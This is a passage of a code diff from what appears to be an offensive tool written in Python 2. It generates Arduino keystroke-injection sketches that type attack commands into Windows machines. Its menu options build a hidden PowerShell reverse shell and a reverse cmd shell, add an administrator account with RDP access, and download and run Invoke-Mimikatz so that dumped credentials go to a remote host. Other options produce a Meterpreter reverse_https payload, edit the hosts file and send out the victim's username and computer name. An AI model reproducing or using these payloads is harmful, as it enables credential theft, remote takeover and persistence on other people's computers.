'42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win4info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption 
!= "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+ payload = "void reverseTCP(){\n"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload += " Keyboard.println(\"$client = New-Object System.Net.Sockets.TCPClient('" + remoteIP + "'," + remotePort + ");$stream = $client.GetStream();"
+ else:
+ payload += " Keyboard.println(\"powershell -w Hidden \\\"$client = New-Object System.Net.Sockets.TCPClient('" + remoteIP + "'," + remotePort + ");$stream = $client.GetStream();"
+ payload += "[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
+ payload += "$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload += "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\");\n"
+ else:
+ payload += "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\\\"\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "reverseTCP();\n"
+
+ WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble)
+
+
+def WinOption5():
+
+ done = False
+ looper = False
+ userName=""
+ userPass=""
+ fileName=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* Add Administrator and Enable RDP for Windows *"
+ print "* This payload will add a user, then add the user to the Administrator Group and RDP Group *"
+ print "* Options are: 1. UserName 2. Password 3. How to bypass UAC 4. The output File name *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set username to add"
+ menu['2'] = "Set username password"
+ menu['3'] = "Set bypassUAC mode"
+ menu['4'] = "Set Arduino sketch filename"
+ menu['5'] = "Set notification bubble option"
+ menu['6'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if userName != "":
+ print "username set to -> " + userName
+ if userPass != "":
+ print "user password set to -> " + userPass
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " + fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection =='1':
+ userName = raw_input("Please enter the username to add to the admin group: ")
+ elif selection == '2':
+ userPass = raw_input("Please enter the password for the new user: ")
+ elif selection == '3':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '4':
+ fileName = coreUtils.getFileName('addAdmin.ino')
+ elif selection == '5':
+ bubble, bubbleSetting = notificationBubble()
+ elif selection == '6':
+ if done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+
coreUtils.clearScreen()
+ break
+ elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win5info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if userName != "" and userPass != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+ payload = "void addUser(){\n"
+ payload += " Keyboard.println(\"net user " + userName + " " + userPass + " /add \");\n"
+ payload += " pressEnter();\n"
+ payload += " delay(100);\n"
+ payload += " Keyboard.println(\"net localgroup administrators " + userName + " /add\");\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"net localgroup \\\"remote desktop users\\\" " + userName + " /add\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ else:
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "addUser();\n"
+
+ WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble)
+
+def WinOption6():
+
+ done = False
+ looper = False
+ mimiURL=""
+ remoteIP=""
+ remotePort=""
+ fileName=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* Download & Run Invoke-Mimikatz.ps1 *"
+ print "* This payload will download & run Invoke-Mimikatz.ps1 then send output to remote server *"
+ print "* Options are: 1. The mimikatz URL 2. remote IP 3. Listening Port *"
+ print "* 4. How to bypass UAC 5.
The output File name *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set the URL Invoke-Mimikatz.ps1 is located"
+ menu['2'] = "Set the IP of the remote server"
+ menu['3'] = "Set the listening port of the remote server"
+ menu['4'] = "Set bypassUAC mode"
+ menu['5'] = "Set Arduino sketch filename"
+ menu['6'] = "Set notification bubble option"
+ menu['7'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if mimiURL != "":
+ print "URL of Invoke-Mimikatz.ps1 set to -> " + mimiURL
+ if remoteIP != "":
+ print "The IP of the remote server is set to -> " + remoteIP
+ if remotePort != "":
+ print "The listening port of the remote server is set to -> " + remotePort
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " + fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection =='1':
+ mimiURL = raw_input("Please enter the full URL where Invoke-Mimikatz.ps1 is located (Please include \"http://\" or \"https://\")\nIf left blank, the default https://goo.gl/KBCGCr will be used: ")
+ if mimiURL == "":
+ mimiURL = 'https://goo.gl/KBCGCr'
+ elif selection == '2':
+ remoteIP = raw_input("Please enter the IP of the server to send the Mimikatz to: ")
+ elif selection == '3':
+ remotePort = raw_input("Please enter the port the server will be listening on: ")
+ elif selection == '4':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '5':
+ fileName = coreUtils.getFileName('remoteMimiKatz.ino')
+ elif selection == '6':
+ bubble, bubbleSetting = notificationBubble()
+ elif selection == '7':
+ if
done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+ coreUtils.clearScreen()
+ break
+ elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win6info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if mimiURL != "" and remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+ payload = "void invokeMimiKatz(){\n"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload += " Keyboard.print(\"IEX (New-Object Net.WebClient).DownloadString(\'" + mimiURL + "\'); $port=" + remotePort +"; $remoteHost=\'"+ remoteIP
+ else:
+ payload += " Keyboard.print(\"powershell -w Hidden \\\"IEX (New-Object Net.WebClient).DownloadString(\'" + mimiURL + "\'); $port=" + remotePort +"; $remoteHost=\'"+ remoteIP
+ payload += "\'; $Message = Invoke-Mimikatz -DumpCreds; $socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port); $data = [System.Text.Encoding]::ASCII.GetBytes($Message);"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\");\n"
+ else:
+ payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\\\"\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "invokeMimiKatz();\n"
+
+
WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble)
+
+def WinOption7():
+
+ done = False
+ looper = False
+ DNS=""
+ remoteIP=""
+ fileName=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* Change DNS Entry in Hostfile *"
+ print "* This payload will modify the hostfile to include specific Domain/IP entry *"
+ print "* Options are: 1. Domain Name 2. IP Address 3. How to bypass UAC 5. The output File name *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set the name of the DNS entry"
+ menu['2'] = "Set the IP of the DNS entry"
+ menu['3'] = "Set bypassUAC mode"
+ menu['4'] = "Set Arduino sketch filename"
+ menu['5'] = "Set notification bubble option"
+ menu['6'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if DNS != "":
+ print "The DNS entry is set to -> " + DNS
+ if remoteIP != "":
+ print "The IP of DNS entry is set to -> " + remoteIP
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " + fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection =='1':
+ DNS = raw_input("Please enter the DNS name of the entry you wish to add: ")
+ elif selection == '2':
+ remoteIP = raw_input("Please enter the IP address of the entry you wish to add: ")
+ elif selection == '3':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '4':
+ fileName = coreUtils.getFileName('changeDNS.ino')
+ elif selection == '5':
+
bubble, bubbleSetting = notificationBubble()
+ elif selection == '6':
+ if done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+ coreUtils.clearScreen()
+ break
+ elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win7info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if DNS != "" and remoteIP != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+
+ payload = "void addDNS(){\n"
+ payload += " Keyboard.println(\"powershell -w hidden \\\"ac -Path 'C:\\\\WINDOWS\\\\system32\\\\drivers\\\\etc\\\\hosts' -Value '" + remoteIP + " " + DNS + "';\\\"\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "addDNS();\n"
+
+ WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble)
+
+def WinOption8():
+
+ done = False
+ looper = False
+ URL=""
+ dropFile=""
+ fileName=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* Download File to Desktop *"
+ print "* This payload will download a file and copy it to the user's desktop *"
+ print "* Options are: 1. Full URL to file to download 2.
File Name *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set URL of the file to download to the Desktop"
+ menu['2'] = "Set bypassUAC mode"
+ menu['3'] = "Set Arduino sketch filename"
+ menu['4'] = "Set notification bubble option"
+ menu['5'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if URL != "":
+ print "Full URL to file set to -> " + URL
+ if dropFile !="":
+ print "Name of file being dropped onto Desktop -> " + dropFile
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " + fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection =='1':
+ URL = raw_input("Please enter the full URL of the file (please include \"http://\" or \"https://\"): ")
+ dropFile = coreUtils.getBinary(URL)
+ elif selection == '2':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '3':
+ fileName = coreUtils.getFileName('desktopFile.ino')
+ elif selection == '4':
+ bubble, bubbleSetting = notificationBubble()
+ elif selection == '5':
+ if done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+ coreUtils.clearScreen()
+ break
+ elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win8info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if URL != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+ payload = "void Download(){\n"
+ payload += "
Keyboard.println(\"powershell -w hidden \\\"$url = '"+URL+ "';$output = 'C:\\\\users\\\\'+$env:Username+'\\\\Desktop\\\\"+dropFile+"';Invoke-Webrequest -Uri $url -OutFile $output;exit;\\\"\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "Download();\n"
+
+ WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble)
+
+def WinOption9():
+
+ done = False
+ looper = False
+ remoteIP=""
+ remotePort=""
+ fileName=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* Reverse TCP CMD Prompt *"
+ print "* This payload will create a Reverse TCP CMD Prompt *"
+ print "* Options are: 1. IP Address 2. Listening Port 3.
The output File name *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set IP address of the remote server"
+ menu['2'] = "Set the listening port of the remote server"
+ menu['3'] = "Set bypassUAC mode"
+ menu['4'] = "Set Arduino sketch filename"
+ menu['5'] = "Set notification bubble option"
+ menu['6'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if remoteIP != "":
+ print "IP of the remote server set to -> " + remoteIP
+ if remotePort != "":
+ print "Listening port on the remote server set to -> " + remotePort
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " + fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection =='1':
+ remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ")
+ elif selection == '2':
+ remotePort = raw_input("Please enter the listening port on the remote server:")
+ elif selection == '3':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '4':
+ fileName = coreUtils.getFileName('reverseCMD.ino')
+ elif selection == '5':
+ bubble, bubbleSetting = notificationBubble()
+ elif selection == '6':
+ if done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+ coreUtils.clearScreen()
+ break
+ elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win9info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if remoteIP != "" and remotePort != "" and fileName != "" and
bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+ payload = "void reverseCMD(){\n"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload +="Keyboard.println(\"RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};"
+ else:
+ payload +="Keyboard.println(\"powershell -w hidden -nop -c function \\\"RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};"
+ payload +="exit;};$a='"+remoteIP+"';$p='"+remotePort+"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();"
+ payload +="$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
+ payload +="$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
+ payload +="$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
+ payload +="$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1;"
+ payload +=" while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};"
+ payload +="if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;"
+ payload +="if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload +="if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\");\n"
+ else:
+ payload +="if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\\\"\");\n"
+ payload +="pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "reverseCMD();\n"
+
+ WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble)
+
+def WinOption10():
+
+ done = False
+ looper = False
+ remoteIP= ""
+ remotePort= ""
+ fileName=""
+ RCfile=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* windows/meterpreter/reverse_https *"
+ print "* This payload will create a Reverse HTTPS meterpreter session *"
+ print "* Options are: 1. IP Address 2. Listening Port 3.
The output File name *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set IP address of the remote server"
+ menu['2'] = "Set the listening port of the remote server"
+ menu['3'] = "Set the filename of the Metasploit RC File"
+ menu['4'] = "Set bypassUAC mode"
+ menu['5'] = "Set Arduino sketch filename"
+ menu['6'] = "Set notification bubble option"
+ menu['7'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if remoteIP != "":
+ print "IP of the remote server set to -> " + remoteIP
+ if remotePort != "":
+ print "Listening port on the remote server set to -> " + remotePort
+ if RCfile != "":
+ print "Metasploit RC File name set to -> " + RCfile
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " + fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection =='1':
+ remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ")
+ elif selection == '2':
+ remotePort = raw_input("Please enter the listening port on the remote server:")
+ elif selection == '3':
+ RCfile = coreUtils.getRCFileName('revMetPSH.rc')
+ elif selection == '4':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '5':
+ fileName = coreUtils.getFileName('revMetPSH.ino')
+ elif selection == '6':
+ bubble, bubbleSetting = notificationBubble()
+ elif selection == '7':
+ if done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+ coreUtils.clearScreen()
+ break
+
elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win10info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if remoteIP != "" and remotePort != "" and fileName != "" and RCfile != "" and bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+
+ payload = "void reversePSH(){\n"
+ payload += " Keyboard.println(\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};"
+ payload += "if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='"+remoteIP+"';$p='"+remotePort+"';$c=New-Object system.net.sockets.tcpclient;"
+ payload += "$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;"
+ payload += "$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;"
+ payload += "$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
+ payload += "$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; "
+ payload += "while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};"
+ payload += "if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());"
+ payload += "while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As (visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "
Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "reversePSH();\n"
+
+ coreUtils.msfRCfile(remoteIP,remotePort,'windows/meterpreter/reverse_https',RCfile)
+ WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble)
+
+
+def WinOption11():
+
+ done = False
+ looper = False
+ remoteIP=""
+ remotePort=""
+ fileName=""
+ bypassUACoption=""
+ bubbleSetting=""
+
+ while looper != True:
+
+ coreUtils.clearScreen()
+ print "********************************************************************************************"
+ print "* *"
+ print "* UserName and Computer Name *"
+ print "* This payload will grab the UserName and Computer Name of the who plugged in the device *"
+ print "* Options are: 1. remote IP 2. Listening Port *"
+ print "* *"
+ print "* *"
+ print "********************************************************************************************"
+ print "\n"
+
+ menu = {}
+ menu['0'] = "Info"
+ menu['1'] = "Set the IP of the remote server"
+ menu['2'] = "Set the listening port of the remote server"
+ menu['3'] = "Set bypassUAC mode"
+ menu['4'] = "Set Arduino sketch filename"
+ menu['5'] = "Set notification bubble option"
+ menu['6'] = "Write Arduino sketch"
+ menu['42']= "Return to previous menu"
+ menu['99']= "Exit"
+
+ options=menu.keys()
+ options.sort(key=int)
+ for entry in options:
+ print entry, menu[entry]
+
+ print "\n\n"
+ if remoteIP != "":
+ print "The IP of the remote server is set to -> " + remoteIP
+ if remotePort != "":
+ print "The listening port of the remote server is set to -> " + remotePort
+ if bypassUACoption != "":
+ print "bypassUAC technique set to -> " + bypassUACoption
+ if bubbleSetting != "":
+ print "Notification bubble set to -> " + bubbleSetting
+ if fileName != "":
+ print "Arduino filename set to -> " +
fileName
+
+ selection=raw_input("\nPlease Select: ")
+
+ if selection == '1':
+ remoteIP = raw_input("Please enter the IP of the server to send the data to: ")
+ elif selection == '2':
+ remotePort = raw_input("Please enter the port the server will be listening on: ")
+ elif selection == '3':
+ bypassUACoption,bypassUAC = checkUACBypass()
+ elif selection == '4':
+ fileName = coreUtils.getFileName('userAndComputer.ino')
+ elif selection == '5':
+ bubble, bubbleSetting = notificationBubble()
+ elif selection == '6':
+ if done == False:
+ print "\nYou have not set all the options"
+ raw_input("Press Enter to return to the menu and set all the options")
+ else:
+ looper = True
+ elif selection == '42':
+ coreUtils.clearScreen()
+ break
+ elif selection == '99':
+ exit()
+ elif selection == '0':
+ nfoCore.Win11info()
+ else:
+ print "\n\n***That is not a valid option!***\n\n"
+
+ if remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "":
+ done = True
+
+ if done == True and looper == True:
+ payload = "void userAndComputer(){\n"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload += " Keyboard.print(\"$pc = $env:computername;$user = $env:UserName; $Message = $pc + ' ' + $user; $port=" + remotePort +"; $remoteHost=\'"+ remoteIP
+ else:
+ payload += " Keyboard.print(\"powershell -w Hidden \\\"$pc = $env:computername;$user = $env:UserName; $Message = $pc + ' ' + $user; $port=" + remotePort +"; $remoteHost=\'"+ remoteIP
+ payload += "\'; $socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port); $data = [System.Text.Encoding]::ASCII.GetBytes($Message);"
+ if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)":
+ payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\");\n"
+ else:
+ payload += " $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;\\\"\");\n"
+ payload += " pressEnter();\n"
+ if bypassUACoption == "run As
(visible popup)":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ elif bypassUACoption == "None":
+ payload += " Keyboard.println(\"exit\");\n"
+ payload += " delay(100);\n"
+ payload += " pressEnter();\n"
+ payload += "}\n"
+
+ payloadFunc = "userAndComputer();\n"
+
+ WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble)